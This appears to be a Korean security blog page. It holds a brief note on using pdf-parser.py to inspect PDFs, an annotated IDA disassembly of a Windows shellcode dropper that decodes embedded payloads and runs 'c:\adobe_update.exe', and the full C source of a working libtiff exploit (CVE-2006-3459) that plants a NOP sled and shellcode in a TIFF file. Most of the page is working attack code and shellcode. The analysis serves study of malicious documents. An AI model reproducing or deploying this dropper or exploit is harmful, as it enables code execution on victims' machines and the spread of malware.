posted by 블르샤이닝 2010. 7. 26. 05:32

참고 :
http://www.boannews.com/media/view.asp?page=1&idx=21730&search=&find=&kind=1

http://malwarelab.tistory.com/78
---------------------------------------------------------------------------------------------------------
 이것 때문에 많이 헤맸다.. 우선 에러가 뜨는 문제..... 무슨 이상한 에러가 뜨면서 안 되는 거, print 이 부분에서 엄청 헤맸다.. 외국 사이트 가서 겨우 알게 된 사실.... 버전이 낮은 거였다고 한다... 파이썬이 제길 ㅋㅋㅋ

덕분에 삽질만했군...ㅠㅠ


화면과 같이 잘 되는 것을 확인하였다. 덕분에 이제 스크립트 소스를 볼 수 있게 되었군요 ㅎㅎㅎ 기뻐라..ㅠㅠ 이것으로 한시름 놨군..ㅋㅋ

몇가지 파일 올립니다. 우선 파이썬이랑 그외 필요한 파일 올립니다.
1. 파이썬 설치
2. 압축 파일 나머지 다 풀어서 한곳에 모아놓기(그래도 되고 안 해도 되고 ㅋㅋ 편하니까)
3. pdf-parser.py -a (파일명)
나머진 나중에 ㅋ

참고 파일 :
파이썬 :
그외 나머진 필요한 파일
posted by 블르샤이닝 2010. 7. 22. 16:53
posted by 블르샤이닝 2010. 7. 22. 16:52

2010. 7. 22. 15:17


posted by 블르샤이닝 2010. 7. 22. 11:01
posted by 블르샤이닝 2010. 7. 22. 10:26


;-----------------------------------------------------------------------
; start — IDA listing of a 32-bit Win32 position-independent dropper
; stub (the `start proc` line is not on the page; `start endp` closes it
; below).  Intel/MASM syntax as emitted by IDA.
;
; What the visible instructions do, in order:
;   1. call/pop to learn its own address; a 12-entry API hash table
;      follows the `jmp short`.
;   2. Walk fs:[30h] to a loaded module's base and resolve the 12 hashes
;      against that module's export names (hash = ror(hash,13) + byte).
;      Each hash is overwritten in place with the resolved address, so
;      [edi+8]..[edi+34h] becomes an import table.
;   3. Probe small integers as file handles until one reports a size
;      > 1000h, read that file into a heap buffer and scan it for two
;      8-byte markers ("FVCK",19890604h) and ("KaKa",19811106h).
;   4. XOR-decode the region between the markers, split it into three
;      files at the embedded paths, and run
;      "cmd /c c:\adobe_update.exe <string returned by [edi+8]>".
;
; API identities below are inferred from argument counts and return-value
; checks only — the hashes are not resolved on the page; confirm each by
; resolving the hash table before relying on a name.
;
; Layout relative to edi after `sub edi, 38h` (edi then points at the
; displacement field of the first `call`, by the byte counts below):
;   [edi], [edi+4]        scratch: file handle, file size
;   [edi+8]..[edi+34h]    12 API hashes, replaced by resolved addresses
;   [edi+38h]             "cmd /c c:\adobe_update.exe"
;   [edi+3Fh]             "c:\adobe_update.exe" (inside the above)
;   [edi+58h]             "c:\data.EXE"
;   [edi+68h]             "c:\data.bIN"
;   [edi+78h]             loc_401099 — so the scratch slots [edi+7Ch],
;                         [edi+80h], [edi+90h]..[edi+0ACh] used later
;                         overwrite code that has already executed
;-----------------------------------------------------------------------
call $+5                        ; push EIP of the next instruction (GetPC)
push 0Ch                        ; 12 = number of API hashes to resolve
jmp short loc_401099
db 4Ch, 22h, 80h                ; hash table starts here: IDA's dword grid is off
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h ; by 3 bytes, so hash 1 = 7C80224Ch
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch   ; low byte 0Ch ends hash 12; "cmd" starts right after
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh   ; " /c c:\adobe_upd"
dd 2E657461h, 657865h, 0                        ; "ate.exe\0" + padding
dd 5C3A6300h, 61746164h, 4558452Eh, 0           ; "\0c:\data.EXE\0"
dd 5C3A6300h, 61746164h, 4E49622Eh, 0           ; "\0c:\data.bIN\0"
db 0

loc_401099:
pop ecx                         ; ecx = 0Ch, the hash count
pop edi                         ; edi = address of `push 0Ch` (pushed by call $+5)
scasd                           ; edi += 4: skip push/jmp, now at the hash table
mov eax, fs:30h                 ; PEB (x86 TEB+30h)
mov eax, [eax+0Ch]              ; PEB->Ldr (well-known x86 offset; confirm for the target OS)
mov esi, [eax+1Ch]              ; Ldr->InInitializationOrderModuleList.Flink
lodsd                           ; eax = second entry of that list
mov ebp, [eax+8]                ; ebp = its DllBase — the classic pre-Win7 kernel32 lookup; confirm

loc_4010AB:                     ; outer loop: one pass per hash, ecx = hashes left
push ecx
mov esi, [ebp+3Ch]              ; e_lfanew
mov esi, [esi+ebp+78h]          ; export directory RVA (DataDirectory[0])
add esi, ebp                    ; esi = IMAGE_EXPORT_DIRECTORY*
push esi
mov esi, [esi+20h]              ; AddressOfNames RVA
add esi, ebp
xor ecx, ecx
dec ecx                         ; ecx = -1: name index, pre-incremented below

loc_4010BE:                     ; per exported name
inc ecx
lodsd                           ; eax = next name RVA
add eax, ebp                    ; eax = name string
xor ebx, ebx                    ; ebx = running hash

loc_4010C4:                     ; hash = ror(hash,13) + c for each byte until NUL
movsx edx, byte ptr [eax]
cmp dl, dh                      ; dh is dl's sign extension, so equal only at 00h (or FFh)
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4

loc_4010D3:
cmp ebx, [edi]                  ; [edi] = wanted hash
jnz short loc_4010BE
pop esi                         ; export directory
mov ebx, [esi+24h]              ; AddressOfNameOrdinals
add ebx, ebp
mov cx, [ebx+ecx*2]             ; ordinal for the matched name index
mov ebx, [esi+1Ch]              ; AddressOfFunctions
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp                    ; eax = function address
stosd                           ; overwrite the hash with the address; edi -> next hash
pop ecx
loop loc_4010AB
sub edi, 38h                    ; edi = hash table - 8 (see layout above)
xor esi, esi                    ; esi = candidate handle value

loc_4010F4:                     ; try handles 1, 2, 3, ... until one reports size > 1000h
inc esi
lea eax, [edi+80h]
push eax                        ; out parameter / scratch
push esi                        ; handle
call dword ptr [edi+18h]        ; 2 args, -1 on failure — GetFileSize-like; confirm
cmp eax, 0FFFFFFFFh
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4            ; unsigned: skip files of 1000h bytes or less
mov [edi+4], eax                ; file size
mov [edi+80h], esi              ; handle
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]        ; alloc(40h, size) — GlobalAlloc(GPTR)-like; confirm
mov [edi+7Ch], eax              ; buffer
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]        ; 4 args, -1 on failure — SetFilePointer(h,0,0,0)-like; confirm
cmp eax, 0FFFFFFFFh
jz short loc_40118B
push 0
lea ebx, [edi+90h]
push ebx                        ; out: bytes read
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]        ; 5 args — ReadFile(h, buf, size, &read, 0)-like; confirm
mov ecx, [edi+90h]
sub ecx, 0Ah                    ; ecx = positions to scan (room for an 8-byte marker)
mov eax, [edi+7Ch]

loc_401158:                     ; scan for marker 1: "FVCK" followed by 19890604h
inc eax
cmp dword ptr [eax], 4B435646h  ; "FVCK"
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E

loc_40116A:
loop loc_401158
jmp short loc_40118B            ; not found: free the buffer and try the next handle

loc_40116E:
add eax, 8
mov [edi+94h], eax              ; payload start = byte after marker 1

loc_401177:                     ; scan for marker 2: "KaKa" followed by 19811106h
inc eax
cmp dword ptr [eax], 614B614Bh  ; "KaKa"
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197

loc_401189:
loop loc_401177                 ; exhausted: falls through into the free/retry path

loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]        ; free(buffer) — GlobalFree-like; confirm
jnz loc_4010F4                  ; branches on whatever flags the callee left (fragile); otherwise falls into loc_401197

loc_401197:                     ; eax = address of marker 2
mov [edi+98h], eax              ; payload end
push 2
lea esi, [edi+3Fh]              ; "c:\adobe_update.exe"
push esi
call dword ptr [edi+20h]        ; create(path, 2) — _lcreat-like; confirm
mov [edi], eax                  ; handle 1
push 2
lea esi, [edi+58h]              ; "c:\data.EXE"
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax              ; handle 2
push 2
lea esi, [edi+68h]              ; "c:\data.bIN"
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax             ; handle 3
mov ebx, [edi+98h]
sub ebx, [edi+94h]              ; ebx = payload length
mov eax, [edi+94h]

loc_4011D8:                     ; decode: byte[i] ^= low byte of (length - i); last byte uses key 1
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
mov eax, [edi+94h]              ; decoded payload = three dword lengths, then three blobs back to back
mov ecx, [eax]
mov [edi+0A4h], ecx             ; len 1
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx             ; len 2
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx             ; len 3
add eax, 4
mov esi, eax                    ; esi = blob 1
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]        ; write(handle, buf, len) — _lwrite-like; confirm
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]             ; esi = blob 2
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]             ; esi = blob 3
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]
push dword ptr [edi]
call dword ptr [edi+1Ch]        ; close(handle), three times — _lclose-like; confirm
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]          ; no args; result is consumed below as a NUL-terminated string (GetCommandLineA-like; confirm)
push eax
lea esi, [edi+3Fh]
mov edx, esi

loc_401262:                     ; advance edx to one past the NUL of "c:\adobe_update.exe"
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262

loc_40126B:
mov byte ptr [edx-1], 20h       ; replace that NUL with a space
pop ecx                         ; ecx = string returned by [edi+8]

loc_401270:                     ; append it byte by byte
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270

loc_40127C:
mov [edx], al                   ; terminating NUL
sub esi, 7                      ; esi = [edi+38h] = "cmd /c c:\adobe_update.exe <appended>"
call $+5                        ; push EIP
add [esp+4+var_4], 0Dh          ; +13 = size of this add through the jmp below, so the pushed address now points at the tail after `start endp`
push 0
push esi
push dword ptr [edi+2Ch]        ; pushed as the *return address* of the jump target
jmp dword ptr [edi+0Ch]         ; tail-call f(esi, 0) — WinExec-like by arity; on return it lands in [edi+2Ch], which returns to the tail
start endp

db 6Ah                          ; tail, reached via the adjusted return address: 6A 00 / 6A FF / FF 57 14 =
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)   ; push 0 / push -1 / call [edi+14h] (TerminateProcess-like; confirm), then NOP/zero padding
_text ends


posted by 블르샤이닝 2010. 7. 22. 09:47

#include <stdio.h>
#include <string.h>
#include <tiffio.h>
#include <stdlib.h>
#include <stdbool.h>

/*
 * basic exploit for CVE-2006-3459.
 *
 * $ ./a.out 
 * [*] creating exploit.tif, target address: 0xb7959000
 * [*] marker tag found at offset 524418.
 * [*] success.
 * $ display exploit.tif 
 * uid=1000(taviso) gid=100(users) groups=10(wheel)
 *
 * -- taviso@gentoo.org
 */

/* size of nop sled */
#define SLEDSIZ (2048 << 8)

/* get this address by printing tif->tif_base in a debugger */
#define RETADDR (0xb7919000 + SLEDSIZ/2)

#define MARKER 0xc0de /* this must be unique, make it anything */

/*
 * Payload appended after the NOP sled.  x86 Linux code; the embedded bytes
 * spell "/bin/sh", "-c" and "/usr/bin/id", which is why the sample run in the
 * header prints a uid line.  sizeof(shellcode) includes the string literal's
 * trailing NUL.
 */
unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80";

/*
 * Description of the made-up tag registered via TIFFMergeFieldInfo():
 * 100 SHORT values under tag number MARKER.  MARKER is only a placeholder —
 * main() rewrites that tag number to TIFFTAG_DOTRANGE in the finished file.
 * Initializer order follows libtiff's TIFFFieldInfo struct.
 */
TIFFFieldInfo badfield = {
    MARKER,         /* field_tag: a unique unsigned short we search for */
    100,            /* field_readcount: number of shorts to read onto stack */
    100,            /* field_writecount: number we want to write into file */
    TIFF_SHORT,     /* field_type */
    FIELD_CUSTOM,   /* field_bit */
    1,              /* field_oktochange */
    0,              /* field_passcount */
    "Exploit"       /* field_name, unused */
};

/*
 * Writes exploit.tif, then patches one tag number inside it.
 *
 * The single strip is SLEDSIZ bytes of 0x90 followed by `shellcode`; the
 * directory carries 100 SHORT values sourced from `f` (every entry RETADDR)
 * under the custom tag MARKER.  After TIFFClose() the first two-byte
 * occurrence of MARKER in the file is overwritten with TIFFTAG_DOTRANGE —
 * presumably because libtiff will not write DOTRANGE with that count
 * directly.  The parser defect the result relies on is not shown here
 * (see the CVE reference in the header).
 *
 * Returns 0 on success, 1 on a reported failure.  argc/argv are unused.
 */
int main(int argc, char **argv)
{
    TIFF *tif;
    FILE *mod;
    unsigned char *buf;
    unsigned short d;
    /* f holds 100 x 32-bit values although the field is declared TIFF_SHORT;
     * if libtiff copies 100 shorts from this pointer, on a little-endian host
     * they are the low/high halves of the first 50 entries — confirm. */
    unsigned f[badfield.field_readcount], i;

    /* NOTE(review): RETADDR is an int expression, not a pointer; %p expects void*. */
    fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR);

    /* prepare a buffer containing address of shellcode */
    for (i = 0; i < badfield.field_readcount; i++)
        f[i] = RETADDR;

    /* open the target exploit file */
    if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* teach libtiff about made up tag */
    TIFFMergeFieldInfo(tif, &badfield, 1);

    /* install basic required tags; width equals the strip's byte count */
    TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode));
    TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
    TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
    TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);
    
    /* now send buffer containing return addresses */
    TIFFSetField(tif, MARKER, &f);

    /* NOTE(review): on allocation failure this only prints — control falls
     * through to the memset below with buf == NULL instead of returning 1. */
    if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) {
        fprintf(stderr, "[!] sorry, memory allocation error.\n");
    }
    
    memset(buf, 0x90, SLEDSIZ);
    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));

    /* disguise nop sled and shellcode as image data */
    /* NOTE(review): return value unchecked; buf is never freed (the process
     * exits shortly after). */
    TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode));
    TIFFClose(tif);

    /* okay, now open the file to find the marker tag */
    if ((mod = fopen("exploit.tif", "r+")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* try to find the MARKER by continually reading shorts. */
    /* Each pass reads two bytes and then seeks back one, so the file is
     * scanned at every byte offset and `d` is compared in host byte order.
     * The first hit wins, which is why MARKER must not occur earlier in
     * the file. */

    /* yes, this is ugly. */
    while (true) {
        if (fread(&d, sizeof(short), 1, mod) < 1) {
            fprintf(stderr, "[!] failed to find marker.\n");
            return 1;
        }
        if (d == MARKER) {
            /* NOTE(review): ftell() is long and sizeof() is size_t, so the
             * argument is unsigned and does not match %d. */
            fprintf(stderr, "[*] marker tag found at offset %d.\n", 
                    ftell(mod) - sizeof(short));

            /* rewind ready to overwrite it */
            /* `- sizeof(short)` is an unsigned size_t that is converted to
             * long at the call; this gives -2 on the usual two's-complement
             * targets but is not portable. */
            if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }

            /* i'll use dot range */
            d = TIFFTAG_DOTRANGE;

            /* write it in */
            /* NOTE(review): a failed write is reported but the run still
             * ends with "[*] success." and exit status 0. */
            if (fwrite(&d, sizeof(short), 1, mod) < 1) {
                fprintf(stderr, "[!] failed to write new tag number.\n");
            }

            break;
        } else {
            /* step back one byte so the next read starts at the following
             * byte offset (same size_t-to-long conversion as above) */
            if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }
        }
    }

    fclose(mod);

    fprintf(stderr, "[*] success.\n");
    return 0;
}
